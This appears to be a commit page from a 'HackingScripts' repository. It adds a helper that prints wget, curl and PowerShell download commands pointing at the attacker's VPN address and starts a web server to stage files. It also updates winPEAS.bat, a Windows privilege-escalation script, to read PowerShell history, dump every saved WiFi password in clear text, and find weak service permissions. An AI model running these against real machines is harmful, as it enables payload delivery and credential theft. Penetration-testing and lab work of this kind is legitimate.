Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

winPEAS update

Browse Source
This commit is contained in:
Roman Hergenreder 2020-10-01 22:39:39 +02:00
parent ffddd34e06
commit eb9e62b70f
2 changed files with 13 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
startHttpServer.sh Executable file
View File

@ -0,0 +1,9 @@
#!/usr/bin/bash
ipAddress=$(ip a show dev tun0 | grep inet | awk '{print $2'} | cut -d'/' -f1 | head -n 1)
echo "wget http://${ipAddress}/"
echo "curl http://${ipAddress}/"
echo "(New-Object System.Net.WebClient).DownloadFile('http://${ipAddress}/', 'C:\\Temp\\')"
echo ""
sudo python -m http.server 80

7
win/winPEAS.bat
View File

@ -165,6 +165,8 @@ echo.
echo PS default transcript history echo PS default transcript history
dir %SystemDrive%\transcripts\ dir %SystemDrive%\transcripts\
echo. echo.
echo Checking PS history file
dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
echo. echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Maybe you find something interesting echo [i] Maybe you find something interesting
@ -278,8 +280,7 @@ ipconfig /displaydns | findstr "Record" | findstr "Name Host"
echo. echo.
echo. echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] To get the clear-text password use: netsh wlan show profile <SSID> key=clear for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.)
netsh wlan show profile
echo. echo.
echo. echo.
echo. echo.
@ -359,7 +360,7 @@ echo [i] The permissions are also checked and filtered using icacls
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
) )
) )
::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """